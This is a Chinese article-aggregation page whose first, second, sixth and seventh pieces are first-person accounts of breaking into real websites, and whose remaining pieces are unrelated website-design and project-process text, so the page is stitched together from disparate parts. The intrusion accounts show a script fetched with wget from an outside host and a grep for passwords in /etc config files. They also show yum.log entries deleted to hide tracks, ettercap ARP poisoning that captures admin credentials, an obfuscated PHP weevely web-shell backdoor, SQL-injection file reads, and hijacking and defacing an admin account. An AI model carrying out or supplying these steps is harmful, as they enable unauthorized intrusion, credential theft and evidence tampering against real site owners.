渗透网站的一个过程

| 收藏本文 下载本文 作者:过眼集

下面小编为大家整理了渗透网站的一个过程(共含8篇),欢迎阅读与借鉴!同时,但愿您也能像本文投稿人“过眼集”一样,积极向本站投稿分享好文章。

渗透网站的一个过程

篇1:渗透网站的一个过程

很久没写过文章,对于网站渗透我也不是很在行,

给大家分享分享下吧,拿一个站的过程。

个人口才不好,讲究着看吧。

目标站是帝国系统,基本上没什么洞,幸运的是默认后台并没有改变。

来进行IP查询,会发现有CDN加速,获取不了真是IP。

使用dnsenum进行查询得到了真实IP。

查询了一下,基本上全部都是帝国,只有C的一台机器使用的dedecms,那就从这里下手。

Dede后台被修改,后台从robots.txt获取到。刚好试下新出炉的dede全版本通杀的漏洞。

得到账号密码后登录后台直接拿到shell。

Php函数禁用了,试着用weevely来突破都没有成功,但是并没有对目录进行限制,我还是可以跨越目录的,把sshd和pam文件下载下来进行分析,是否被前辈路过种过什么后门。

这是分析pam文件得到的结果。

既然有后门那就直接登录系统吧,pam后门里面分析得到了密码记录文件,轻松获取系统密码,挺感谢这个前辈。

当然,这种情况下渗透太危险,因为你的IP已经泄漏。

root pts/1   192.168.0.0        15:32   2:05m 1:40  7.84s -bash

root pts/3   192.168.0.0        15:54   3:06m 0.34s 7.84s -bash

root@glles08:~# wget 210.34.xxx.xxx/ip.py

---04-16 19:04:48-- 210.34.xxx.xxx/ip.py

正在连接 110.34.195.194:80... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:3849 (3.8K) [text/x-python]

正在保存至: “ip.py”

100%[===================================================================================================================================================================================================>] 3,849      --.-K/s   in0s

2014-04-16 19:04:48 (291 MB/s) - 已保存 “ip.py” [3849/3849])

root@glles08:~# python ip.py -u root -f 210.34.xxx.xxx

root@glles08:~# w

19:05:01 up 1 day, 1:30, 3 users, load average: 1.03, 1.03, 1.00

USER    TTY     FROM             LOGIN@  IDLE  JCPU  PCPU WHAT

root                 pts/2    :2.0            Tue22   3:33m 0.01s 0.01s /bin/bash

已经不见了。

下面可以放心的渗透了,查看了下history记录,笑了。

68 cat aaaa.txt

69 netstat -anpt

70 history

71 cat ntpupdatedate.sh

72 iptables -nvL

73 tcpdump -i eth0

74 tcpdump -o eth0

75 tcpdump --help

76 tcpdump -i eth0

77 tcpdump -iv eth0

78 tcpdump -i -v eth0

79 tcpdump -v -i eth0

80 w

81 last

82 last | grep ftpuser

83 cd /var/ftp/pub/

84 ls

85 cd ..

86 ls

87 cd ..

88 clear

89 id ftpuser

90 cat /etc/passwd

91 ll

92 ps -Af

93 tcpdump

94 who

95 who

96 who

97 tcpdump

98 tcpdump -v

99 iostat

100 istat

101 tail -f /var/spool/mail/root

102 /sbin/ntpdate

103 cd /

104 find -name ntpdate

105 vi root/ntpupdatedate.sh

106 tcpdump -vv

107 su - ftpuser

108 last

109 ll

110 vi /etc/passwd

111 cd /www/upload/ftproot/cms

112 ll

228 echo '' access

229 echo '' access.log

230 echo '' > access.log

看来我高估那个前辈了。

因为不是内网,没必要翻什么配置文件,C直接就嗅探了。

这里给大家说一下吧,如果在渗透内网的时候要翻记录密码的文件内容的话可以使用这条命令:

grep -r --include=”*.conf” “pass” /etc/                #递归查看所有.conf文件里面包含pass内容的文件。

root@glles08:~# cd /etc/yum.repos.d/

root@glles08:~# ls

CentOS-Base.repo CentOS-Debuginfo.repo CentOS-Media.repo CentOS-Vault.repo

root@glles08:~# uname -a

Linux cloud 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC i686 i686 i386 GNU/Linux

root@glles08:~# vi ettercap.repo

[etter]

name=etter

baseurl=dl.fedoraproject.org/pub/epel/6/i386/

enabled=1

gpgcheck=0

root@glles08:~#yum clean all

yum insLoaded plugins: fastestmirror, refresh-packagekit, security

Cleaning repos: base etter extras updates

Cleaning up Everything

tCleaning up list of fastest mirrors

root@glles08:~#yum install ettercap -y

Loaded plugins: fastestmirror, refresh-packagekit, security

Determining fastest mirrors

* base: centos.01link.hk

* extras: centos.01link.hk

* updates: mirror.sunnyvision.com

base                                                                                                                                                                                                                 | 3.7 kB    00:00

base/primary_db                                                                                                                                                                                                       | 3.5 MB    00:00

etter                                                                                                                                                                                                                | 4.4 kB    00:00

etter/primary_db                                                                                                                                                                                                      | 5.0 MB    00:07

extras                                                                                                                                                                                                               | 3.4 kB    00:00

extras/primary_db                                                                                                                                                                                                     | 18 kB    00:00

updates                                                                                                                                                                                                              | 3.4 kB    00:00

updates/primary_db                                                                                                                                                                                                    | 2.4 MB    00:00

Setting up Install Process

Resolving Dependencies

--> Running transaction check

---> Package ettercap.i686 0:0.7.5-3.el6.1.0906gitc796e5 will be installed

--> Processing Dependency: libnet.so.1 for package: ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686

--> Running transaction check

---> Package libnet.i686 0:1.1.6-7.el6 will be installed

--> Finished Dependency Resolution

Dependencies Resolved

=============================================================================================================================================================================================================================================

Package                                             Arch                                            Version                                                                      Repository                                        Size

=============================================================================================================================================================================================================================================

Installing:

ettercap                                            i686                                            0.7.5-3.el6.1.20120906gitc796e5                                              etter                                            472 k

Installing for dependencies:

libnet                                              i686                                            1.1.6-7.el6                                                                  etter                                             59 k

Transaction Summary

=============================================================================================================================================================================================================================================

Install      2 Package(s)

Total download size: 531 k

Installed size: 1.5 M

Downloading Packages:

(1/2): ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686.rpm                                                                                                                                                             | 472 kB    00:01

(2/2): libnet-1.1.6-7.el6.i686.rpm                                                                                                                                                                                   | 59 kB    00:00

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Total                                                                                                                                                                                                       308 kB/s | 531 kB    00:01

Running rpm_check_debug

Running Transaction Test

Transaction Test Succeeded

Running Transaction

Installing : libnet-1.1.6-7.el6.i686                                                                                                                                                                                                  1/2

Installing : ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686                                                                                                                                                                            2/2

Verifying : libnet-1.1.6-7.el6.i686                                                                                                                                                                                                  1/2

Verifying : ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686                                                                                                                                                                            2/2

Installed:

ettercap.i686 0:0.7.5-3.el6.1.20120906gitc796e5

Dependency Installed:

libnet.i686 0:1.1.6-7.el6

Complete!

root@glles08:~#

root@glles08:~#cat /var/log/yum.log

Apr 15 22:04:09 Installed: tigervnc-server-1.1.0-8.el6_5.i686

Apr 15 22:04:11 Installed: tigervnc-1.1.0-8.el6_5.i686

Apr 16 12:03:59 Installed: nc-1.84-22.el6.i686

Apr 16 15:25:36 Updated: xorg-x11-server-common-1.13.0-23.1.el6.centos.i686

Apr 16 15:25:41 Updated: openssl-1.0.1e-16.el6_5.7.i686

Apr 16 15:25:42 Installed: xorg-x11-server-Xvfb-1.13.0-23.1.el6.centos.i686

Apr 16 16:23:02 Installed: 2:nmap-5.51-3.el6.i686

Apr 16 19:13:33 Installed: libnet-1.1.6-7.el6.i686

Apr 16 19:13:37 Installed: ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686

root@glles08:~#sed -i '/19:/d' /var/log/yum.log

root@glles08:~#cat /var/log/yum.log

Apr 15 22:04:09 Installed: tigervnc-server-1.1.0-8.el6_5.i686

Apr 15 22:04:11 Installed: tigervnc-1.1.0-8.el6_5.i686

Apr 16 12:03:59 Installed: nc-1.84-22.el6.i686

Apr 16 15:25:36 Updated: xorg-x11-server-common-1.13.0-23.1.el6.centos.i686

Apr 16 15:25:41 Updated: openssl-1.0.1e-16.el6_5.7.i686

Apr 16 15:25:42 Installed: xorg-x11-server-Xvfb-1.13.0-23.1.el6.centos.i686

Apr 16 16:23:02 Installed: 2:nmap-5.51-3.el6.i686

root@glles08:~#

root@glles08:~#ettercap -T -M arp // // -q -i eth0

ettercap 0.7.5 copyright -2012 Ettercap Development Team

Incorrect number of token (///) in TARGET !!

root@glles08:~#ettercap -T -M arp /// /// -q -i eth0

ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Privileges dropped to UID 65534 GID 65534...

28 plugins

39 protocol dissectors

53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services

Randomizing 7 hosts for scanning...

Scanning the whole netmask for 7 hosts...

* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)

Starting Unified sniffing...

HTTP : 122.11.xxx.xxx:80 -> USER: admin PASS: 82413113 INFO: xxx.xxx.com/e/admin/index.php

抓获到密码之后,发现了愚蠢的事,只抓到账号密码忘记设置认证码了,

帝国登录后台有账号:密码:认证码:

需要到ettercap里面定义。

root@glles08:~#rpm -ql ettercap

/etc/ettercap

/etc/ettercap/etter.conf

/etc/ettercap/etter.dns

/etc/ettercap/etter.nbns

/usr/bin/ettercap

/usr/bin/etterfilter

/usr/bin/etterlog

/usr/lib/ettercap

/usr/lib/ettercap/ec_arp_cop.so

/usr/lib/ettercap/ec_autoadd.so

/usr/lib/ettercap/ec_chk_poison.so

/usr/lib/ettercap/ec_dns_spoof.so

/usr/lib/ettercap/ec_dos_attack.so

/usr/lib/ettercap/ec_dummy.so

/usr/lib/ettercap/ec_find_conn.so

/usr/lib/ettercap/ec_find_ettercap.so

/usr/lib/ettercap/ec_find_ip.so

/usr/lib/ettercap/ec_finger.so

/usr/lib/ettercap/ec_finger_submit.so

/usr/lib/ettercap/ec_gre_relay.so

/usr/lib/ettercap/ec_gw_discover.so

/usr/lib/ettercap/ec_isolate.so

/usr/lib/ettercap/ec_link_type.so

/usr/lib/ettercap/ec_nbns_spoof.so

/usr/lib/ettercap/ec_pptp_chapms1.so

/usr/lib/ettercap/ec_pptp_clear.so

/usr/lib/ettercap/ec_pptp_pap.so

/usr/lib/ettercap/ec_pptp_reneg.so

/usr/lib/ettercap/ec_rand_flood.so

/usr/lib/ettercap/ec_remote_browser.so

/usr/lib/ettercap/ec_reply_arp.so

/usr/lib/ettercap/ec_repoison_arp.so

/usr/lib/ettercap/ec_scan_poisoner.so

/usr/lib/ettercap/ec_search_promisc.so

/usr/lib/ettercap/ec_smb_clear.so

/usr/lib/ettercap/ec_smb_down.so

/usr/lib/ettercap/ec_smurf_attack.so

/usr/lib/ettercap/ec_sslstrip.so

/usr/lib/ettercap/ec_stp_mangler.so

/usr/share/applications/fedora-ettercap.desktop

/usr/share/doc/ettercap-0.7.5

/usr/share/doc/ettercap-0.7.5/AUTHORS

/usr/share/doc/ettercap-0.7.5/CHANGELOG

/usr/share/doc/ettercap-0.7.5/LICENSE

/usr/share/doc/ettercap-0.7.5/README

/usr/share/doc/ettercap-0.7.5/THANKS

/usr/share/doc/ettercap-0.7.5/TODO

/usr/share/doc/ettercap-0.7.5/TODO.TESTING

/usr/share/doc/ettercap-0.7.5/doc

/usr/share/doc/ettercap-0.7.5/doc/capture

/usr/share/doc/ettercap-0.7.5/doc/decoders

/usr/share/doc/ettercap-0.7.5/doc/dissectors

/usr/share/doc/ettercap-0.7.5/doc/plugins

/usr/share/doc/ettercap-0.7.5/doc/threads

/usr/share/doc/ettercap-README.fedora

/usr/share/doc/ettercap_easter_egg_license.txt

/usr/share/ettercap

/usr/share/ettercap/etter.fields

/usr/share/ettercap/etter.filter

/usr/share/ettercap/etter.filter.examples

/usr/share/ettercap/etter.filter.kill

/usr/share/ettercap/etter.filter.pcre

/usr/share/ettercap/etter.filter.ssh

/usr/share/ettercap/etter.finger.mac

/usr/share/ettercap/etter.finger.os

/usr/share/ettercap/etter.mime

/usr/share/ettercap/etter.services

/usr/share/ettercap/etter.ssl.crt

/usr/share/ettercap/ettercap.png

/usr/share/ettercap/etterfilter.cnt

/usr/share/ettercap/etterfilter.tbl

/usr/share/ettercap/etterlog.dtd

/usr/share/icons/hicolor/32x32/apps/ettercap.png

/usr/share/man/man5/etter.conf.5.gz

/usr/share/man/man8/ettercap.8.gz

/usr/share/man/man8/ettercap_curses.8.gz

/usr/share/man/man8/ettercap_plugins.8.gz

/usr/share/man/man8/etterfilter.8.gz

/usr/share/man/man8/etterlog.8.gz

root@glles08:~#cd /usr/share/ettercap/

[root@cloud ettercap]# ls

ettercap.png etter.filter    etter.filter.examples etter.filter.pcre etterfilter.tbl  etter.finger.os etter.mime     etter.ssl.crt

etter.fields etterfilter.cnt etter.filter.kill      etter.filter.ssh   etter.finger.mac etterlog.dtd    etter.services

[root@cloud ettercap]# vi etter.fields

############################################################################

#                                                                         #

# ettercap -- etter.felds -- known HTTP form. fields                      #

#                                                                         #

# Copyright (C) ALoR & NaGA                                              #

#                                                                         #

# This program is free software; you can redistribute it and/or modify   #

# it under the terms of the GNU General Public License as published by   #

# the Free Software Foundation; either version 2 of the License, or      #

# (at your option) any later version.                                    #

#                                                                         #

############################################################################

# Version        : $Revision: 1.6 $                                     #

############################################################################

#                                                                         #

# This file contains the form. fields recognized as user or password by   #

# the HTTP dissector. You can add your own fields in the right section   #

#                                                                         #

############################################################################

[USER]

login

unickname

user

email

username

userid

form_loginname

loginname

pop_login

uid

id

user_id

screenname

uname

ulogin

acctname

account

member

mailaddress

membername

login_username

login_email

uin

sign-in

[PASS]

pass

password

passwd

form_pw

pw

userpassword

pwd

upassword

login_password

passwort

passwrd

upasswd

[loginauth]

Loginauth

再次嗅探。

root@glles08:~#ettercap -T -M arp // // -q -i eth0

ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team

Incorrect number of token (///) in TARGET !!

root@glles08:~#ettercap -T -M arp /// /// -q -i eth0

ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Privileges dropped to UID 65534 GID 65534...

28 plugins

39 protocol dissectors

53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services

Randomizing 7 hosts for scanning...

Scanning the whole netmask for 7 hosts...

* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)

Starting Unified sniffing...

HTTP : 122.11.xxx.xxx:80 -> USER: admin PASS: 82413113 loginauth: admin81818 INFO: xxx.xxx.com/e/admin/index.php

成功进入后台。

其实遇到了狗,那部分没截图,试着绕过安全狗。

root@software:/usr/share/weevely# cat test.php

$yedq=”JGM9J2NvdfW50JzskYT0fkX0NPT0tJRTftfpZihyZXfNldCgfkYSk9PSdoZScgJiYgJGMoJGEpP”;

$aokr=”ZXBfsYfWNlKGFycfmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKfycpLCBqbf2luKGF”;

$mnuq = str_replace(“h”,”“,”hsthr_rhehphlhahce”);

$igxs=”jMpeyRrPSdsZWf5tafmonO2VjfaG8gJzwnLifRrLic+JztldmFsKGJhfc2U2NF9kZWNvZGUfocHJlZ19y”;

$aqub=”ycmF5X3fNsfaWNlKCRhfLfCRjfKCRhKS0fzKSkpKSk7ZWNobyAnfPC8nLiRrLicf+fJfzt9″;

$ursh = $mnuq(“h”, “”, “hbahseh6h4h_hdecohdhe”);

$urfu = $mnuq(“x”,””,”crexaxtxex_xfxunxcxtxixoxn”);

$nvfj = $urfu(”, $ursh($mnuq(“f”, “”, $yedq.$igxs.$aokr.$aqub))); $nvfj;

?>root@software:/usr/share/weevely# weevely xxx.xxx.com/2.php helenmjj

________              __

|  |  |  |—–.—-.-.–.—-’  |–.–.

|  |  |  |  -__| -__| |  | -__|  |  |  |

|________|_____|____|___/|____|__|___  | v1.0

|_____|

Stealth tiny web shell

[+] Welcome to Weevely. Browse filesystem and execute system commands.

[+] Use ‘:help’ to list available modules and run selected one.

[shell.php] No response with Cookie method

[shell.php] No response with Referer method

[!] [shell.php] PHP and Shell interpreters load failed

root@software:/usr/share/weevely#

还是没过。。。

然后本地搭建web环境来连接

至此结束!

篇2:对一个网站进行渗透的过程

我已经有很长很长的时间没有写过入侵渗透类型的技术文章了,今天心血来潮就写一份吧

希望在渗透入侵的漫长过程中让大家懂得更多的奥妙

在渗透的时候一般先是踩点,接着才实行入侵渗透攻击

那我就先说说踩点

踩点工具 有主动被动

所谓的主动 讲白了 就是你用扫描工具主动的对网站的弱点进行探测和获取网站的信息;

而被动就是在正常访问的情况下获取网站的一些信息

当然 被动所获取的信息和主动是没法比的

其中被动踩点的工具 其中灰帽中所说的p0f

他可以通过你正常访问网站 从而获取网站操作系统的信息

使用方法就不在本文的诉述范围之内了;

主动踩点的工具有很多扫描工具 如nmap等

nmap有隐蔽式的扫描 具体参数我忘了 本人很少注意自己的安全

有必要的情况下可以把网站的镜像全部问下载下来(我知道不是网站的建站源文件)可能在网站一些文件的注释里面会隐藏一些你意想不到的东西 还有CSS文件 有的人喜欢在CSS文件的前面写上自己名字之类的还可以通过这样的方法找到建站的系统 从而去查看是否有漏洞而且实行攻击;你可以去查看网站的IP 然后去查看物理地址;

有的网站下面会有手机或者电话号码 也可以查看到物理地址;

从而判断服务器是买的还是在自己公司;如果在主站未发现任何漏洞;还可以从同服务器的网站入手;但是一些大中型公司都是独立服务器的甚至整个C段都是,这样就一丝敏感的信息都不能放过;

甚至是服务器网站的美工与制作者;只要和网站牵扯上的都有可能成为突破点(那用0day ip 不在本文探讨之内)

获取旗标

(旗标就是网站的软件版本信息)

对网站服务器软件的旗标获取;可以通过对网站提交错误数据;或者构造一个不存在的地址看他报错的信息从而判断出版本;

还可以通过抓包查看http头来查看;当然自动获取的工具也有很多;

对于FTP获取版本 可以直接连接上去查看默认的欢迎信息就可以查看到服务器的版本;

可以通过nc -nvv ip 端口 获取;

对于telnet 是对目标主机的系统信息获取的很好的一个途径

在linux下基本没多少人用telnet应为telnet是不安全的协议;

ssh也有win的移植版;看到telnet的信息可以判是路由还是系统

当然其中不包括修改了banner的;

收集信息

对于信息的收集上面也算提到了一些;

我们还可以对目标网站的域名whois进行查询;

这样可以获取的到一些注册信息 尽管可能不是网站管理员的;

至少我们可以知道DNs这样我们就可以按需要来是否可以尝试劫持dns

在知道服务器物理地址或者管理电话的物理地址的情况下;

(对网站漏洞进行扫描我一般都是用wvs,linux下用no啥的我忘记了,速度很慢,但是得到的东西真不错)

可以去谷歌地球查看所在地的周边情况;这样在办成认识人的情况下进行电话社工的几率又增加了一些

还有就是我在开头所说的查看网页的源文件可能发现一些意想不到的东西;

还可以利用Google hack 进行获取更多的信息;

在无法找到网站后台或者错误信息等情况下 可以试试通过谷歌hack

本人在注入mysql的网站的时候 有写权限 但是苦于没有绝对路径

我就去谷歌 site:网站 error 等 错误提示 从而找到了绝对路径 成功写入一句话

还可以通过谷歌查找网站的电话号码或者email等;从而收集到网站管理或者公司员工的

一些敏感信息;这样对社工是大有好处的

对于信息的收集还有很多;在此我就不一一叙述了;

整理信息

对于信息的整理还有有必要的;

至少要对收集的信息进行归类;可能在独立进行渗透的时候不会发现什么坏处;

但在对一个大型网站或者团队进行渗透的时候信息的整理就是很有必要的了;

在对大型的网站进行渗透不是一天俩天的事情;时间久了 可能你记得你在那个文件里记录了

一些东西 现在要用到了;可以却找不到了;

这样的情况不是没有的,这样对信息的整理就很必要;

团队渗透的时候都是分工;你得到的信息别人至少能看明白

如果不加整理;这样别人看的不方便还要你给解释;

在进行到关键步骤的时候一分一秒都不能耽搁的;

实行攻击

好了;前面做了那么多,现在开始实行攻击了;

在对网站攻击前准备我们已经准备好了;是不是就说明

我们肯定能拿下目标了吗?这是不可能的;

通过踩点就是以上3部得到整理好的信息从而实行攻击;

攻击必须是有目的性的,首先确立为了什么而攻击;

怎么去攻击;成功了之后该怎么办,被发现了怎么办,

遇到一些特殊情况该怎么办等等 计划好了从而实行攻击

(感觉这些应该放在踩点之前 汗 文章写的比较乱,第一次写文章)

在知道对方一些弱点的信息的情况下而选择相应的攻击方式;

不可能说 明明是注入漏洞,你非要去让他产生XSS,

在知道对方建站系统的情况下可以尝试查找相对应的漏洞,来进行攻击

也可以查找对方应用软件的漏洞进行漏洞攻击..

攻击的方法就看你所收集的信息而定了;

所以说踩点是很重要的,

对一个网站进行渗透的过程

网络安全个人认为踩点所获得的信息有可能决定整个渗透过程的成败。

篇3:一个网站设计过程举例

一个网站设计过程举例 -文秘文书

一、网站的规划要求:选准主题,优化内容;计划书的内容:1、你所选网站的主题和内容简介;2、网站的结构(最好能是一个完整的结构,因为这样对你后面的设计有较大的帮助。);3、网站能包含的功能;4、哪些地方计划使用数据库;5、如何安排进度和计划完成时间?6、如果是两个人合作的,每个人的分工如何?二、网站的设计设计语言:1、HTML2、ASP――Active Server Pages,是服务器端脚本编程环境。使用ASP可将HTML、脚本命令和ActiveX组件组合起来,创建动态、交互的网站。3、VBScript――是ASP事务处理的核心。是VB的简化版本,用于对HTML和ASP进行处理的编程语言,支持嵌入HTML和ASP文件中。4、SQL――结构化查询语言,在网站中尽量使用数据库可以使维护更加方便,查询功能强大。建立运行环境:1、建站环境:Windows + IIS2、数据库:可选用Access或sqlserverASP程序三个特点:1、纯文本文件;2、文件扩展名为.asp;3、文件中相关的asp程序代码包含在<%  %>当中。学习ASP的方法:1、全面了解一下ASP的基本概念(如:asp的特点、运行环境等)、基本设计方法(如:编写ASP的基本框架、与HTML的关系等)、基本指令和一些特殊文件(如Global.asa等)。2、学习一些脚本语言(如:VBScript、JScript等),我们选VBScript是在于它的结构与VB类似,大家都学过VB,并且ASP与它同是Microsoft的产品,结合能力较强。三、题目小型电子商务网站的规划与设计四、设计目的网站的建设是各个企业投身Internet的第一步,本毕业设计希望通过对电子商务网站的规划与设计来培养学生综合运用所学知识分析和解决实际问题的能力,掌握相关网页制作软件,强化计算机实际应用技能训练,为今后开展网站规划、设计和开发打下初步的基础。1、  运用Dreamwearer等网络制作软件制作主页及其相关链接的.页面。2、  主页要求:清纯简洁、主题鲜明、内容编排得当合理、有一定的艺术感,美观、实用,相关链接正常,能体现网站首页的基本功能。3、  网站具备的基本功能:用户注册、公司简介、产品目录、商品展示、订购及查看购物车等。4、  选题要得当,形式可以多样,但内容要健康。5、  网站建立后要完成测试,最后将运行稳定的网站所有文件用磁盘或光盘拷贝给指导老师。五、 论文书写内容要求:1、  封面2、  目录3、  论文摘要、关键词4、  建立该网站的目的、意义;5、  当前网站建设的基本情况,本网站的总体规划、功能和设计目标,包含网站的结构图;6、  本网站设计中具体实现的几个关键功能和相关技术说明;7、  使用数据库的部分要列出相关数据结构及实现的算法;8、  网站测试及发布的情况(含测试环境、条件、性能的分析等);9、  网站建设的心得体会和扩展性分析;10、致谢;11、参考文献。

篇4:一个网站设计过程举例

一、网站的规划要求:选准主题,优化内容;计划书的内容:1、你所选网站的主题和内容简介;2、网站的结构(最好能是一个完整的结构,因为这样对你后面的设计有较大的帮助,

一个网站设计过程举例

。);3、网站能包含的功能;4、哪些地方计划使用数据库;5、如何安排进度和计划完成时间?6、如果是两个人合作的,每个人的分工如何?二、网站的设计设计语言:1、HTML2、ASP――Active Server Pages,是服务器端脚本编程环境。使用ASP可将HTML、脚本命令和ActiveX组件组合起来,创建动态、交互的网站。3、VBScript――是ASP事务处理的核心。是VB的简化版本,用于对HTML和ASP进行处理的编程语言,支持嵌入HTML和ASP文件中。4、SQL――结构化查询语言,在网站中尽量使用数据库可以使维护更加方便,查询功能强大。建立运行环境:1、建站环境:Windows 2000 + IIS2、数据库:可选用Access或sqlserverASP程序三个特点:1、纯文本文件;2、文件扩展名为.asp;3、文件中相关的.asp程序代码包含在<%  %>当中。学习ASP的方法:1、全面了解一下ASP的基本概念(如:asp的特点、运行环境等)、基本设计方法(如:编写ASP的基本框架、与HTML的关系等)、基本指令和一些特殊文件(如Global.asa等)。2、学习一些脚本语言(如:VBScript、JScript等),我们选VBScript是在于它的结构与VB类似,大家都学过VB,并且ASP与它同是Microsoft的产品,结合能力较强。三、题目小型电子商务网站的规划与设计四、设计目的网站的建设是各个企业投身Internet的第一步,本毕业设计希望通过对电子商务网站的规划与设计来培养学生综合运用所学知识分析和解决实际问题的能力,掌握相关网页制作软件,强化计算机实际应用技能训练,为今后开展网站规划、设计和开发打下初步的基础,

篇5:一个网站设计过程举例

1、  运用Dreamwearer等网络制作软件制作主页及其相关链接的页面。2、  主页要求:清纯简洁、主题鲜明、内容编排得当合理、有一定的艺术感,美观、实用,相关链接正常,能体现网站首页的基本功能。3、  网站具备的基本功能:用户注册、公司简介、产品目录、商品展示、订购及查看购物车等。4、  选题要得当,形式可以多样,但内容要健康。5、  网站建立后要完成测试,最后将运行稳定的网站所有文件用磁盘或光盘拷贝给指导老师。五、 论文书写内容要求:1、  封面2、  目录3、  论文摘要、关键词4、  建立该网站的目的、意义;5、  当前网站建设的基本情况,本网站的总体规划、功能和设计目标,包含网站的结构图;6、  本网站设计中具体实现的几个关键功能和相关技术说明;7、  使用数据库的部分要列出相关数据结构及实现的算法;8、  网站测试及发布的情况(含测试环境、条件、性能的分析等);9、  网站建设的心得体会和扩展性分析;10、致谢;11、参考文献。

篇6:记一个简单的渗透测试过程

PS:本人技术很菜,大牛莫怪

朋友发来的一个站,让我帮忙看看,用了一上午时间把主站搞定了,可是主站是提不了权LINUX,而且内网90%都是WINDOWS的服务器,拿LINUX搞WINDOWS各种不爽,况且还是个低权限的,NMAP的各种参数都用不了。又从外网看了下C段,除了主站外对外开了三个WEB服务,俩静态的放弃了,就剩一个2K3+IIS+ASP的站。就他了!

操起各种SCANNER一顿扫,没注入点,找到了后台路径。惆怅了!发现了一个能和管理员留言的地方,于是乎猥琐流XSS盲打后台。管理员也很不负责,M天之后他才登陆。进了后台,发现管理员的密码居然是123456,真想狠狠的抽自己个嘴巴,然后再把手剁了!

进了后台发现了一处上传图片,未果,放弃。又四处逛逛,发现有个上传档案的地方,应该能上传webshell(如图1)。上传了个ASP文件成功了,点了下后台的下载链接居然直接下载了,找不到上传路径。抓包看了下,也不行。

我突然对这个上传产生了一点自己的看法,那就是:MLGB!!

没办法,想着在后台找个注入点读数据,把写在数据库里download的路径读出来,

有的被过滤了,有的加引号报错(图2),MYSQL4的数据库,UNION查询9个字段,但是提示类型不正确CINT,应该是ASP代码里强制加了类型转换。

继续在后台找别的注入点,发现了能正常UNION查询的,搞之。MYSQL4的数据库果断LOAD_FILE。先读IIS的配置文件C:WINDOWSsystem32inetsrvMetaBase.xml,得到网站根目录。之后load_file数据库连接文件,在之前的LINUX的SHELL里连,怎么都连不上,纳闷了。猜数据库的表和列,猜到表了,但是死活猜不出保存上传存储路径的列。

没办法,读download.asp,的文件得到如图3.

分析下代码,请注意

strAbsFile = Server.MapPath(“.”) & “file” & strSNO & trim(rs(“”))

这句。

原来上传的文件保存规则是网站根路径file上传文件的ID.后缀。

这样问题就解决了!嗯哼,成功拿到webshell,然后就开始各种猥琐的内网渗透,就不写了。。

因为是上班时间,行文比较流水,请大家见谅。

最后总结一下全文: 是中国的!

篇7:渗透动易 站过程

很久没有搞 站了,一直忙些杂七杂八的东西

这几天抽出时间,活动了下,。

寻思目标,大部分 站都有被河蟹的前科

于是乎找个被人 的比较少的站点来玩下,就看上了 www.hack371.com

主站一看就是动易的模板,而且是独立主站,只有玩C段了

目标IP是203.171.228.103,嗅探的话 ,最好选择离的近些的

于是我手工从203.171.228.90开始一个一个的搞,还好这个C段服务器比较多

人品还不错,一时搞下几个shell,不过都没能提权

最后就搞到一个离目标稍微近些的服务器,居然用烤肉提权成功了

进去服务器才知道,是个VPS,配置很一般,一核,20G的硬盘

有点好奇的是,居然装有阿里旺旺,日啊

还好弄了一个Cain(下载地址:www.heibai.net/download/Soft/Soft_5975.htm)上去,开始嗅探。。。

同一个网关的机器,就全部选上了。。

过了一会,Cain崩溃了,从新设置了下,只嗅探103这个

嗅了一晚上,没找到有用的东西,都是百度快照之类的

到了今天下午,终于嗅到了管理后台密码

刚开始朋友说,管理不在线,我就进去拿shell

动易的网站拿shell,就那几种方法

添加频道,利用解析漏洞拿shell,

。。

不幸的事情发生了,不能添加,两人不能用一个帐号

肯定是管理在线了,后来证明了我的猜测

再次登录的时候,提示密码不正确

这个到不用怕,因为另一台机器在嗅探

管理该的密码都能知道的,停了几分钟

忽然有个邪恶的想法,把管理密码修改掉

我朋友看着Cain嗅探的数据包发笑,管理没辙了

本来想让他登录FTP呢,这下算了,直接进后台吧

很轻易的拿到shell,有他妈悲剧了

网站打不开了,估计是被D,或者是管理把服务器关闭了

没办法,纠结的 ,继续等待吧

一小时后,终于恢复了,shell还在

有点气愤昂,就把主页备份下,和谐之

已经通知了管理,那小子倒是挺热情,一句一个大哥

喊的我都不好意思。。。。

最后,简单沟通了下,完事

没啥技术含量,大牛莫笑

篇8:网站建设是一个坚守的过程

谈到网站建设,每个网站建设公司都有着严格的、标准的操作流程,以及明确的执行标准,也许存在一定的差异性,但是杭州网博认为,网站建设部门的各个团队须坚守和执行,力求操作的每一个项目都严谨、高质量的完成,没有太大的差异化,带给客户良好的体验,这才是专业网站建设公司必须坚守的!

网站建设项目可以分为以下三个阶段进行:

第一阶段:网站建设的售前阶段:

网站建设项目进入项目组操作之前,销售人员会了解清楚客户的建站需求,确认好网站的栏目架构及功能模块,在网站首付款到位后,项目正式交给项目组。销售需填写《项目启动单》,提交给项目总监,项目总监预估项目工时、分配项目组,确认负责人员。

销售同时把项目电子版的合同、方案、客户信息等资料一并交给项目经理,项目经理会与销售做详细的沟通和交接,然后项目经理组织包括客户、销售及项目各岗位技术人员共同参与的“项目启动会议”,正式启动项目。所有相关的客户信息、启动时间及操作流程,会由项目经理及时录入项目管理系统(Project系统)。

第二阶段:网站建设的售中阶段:

1、设计岗位:

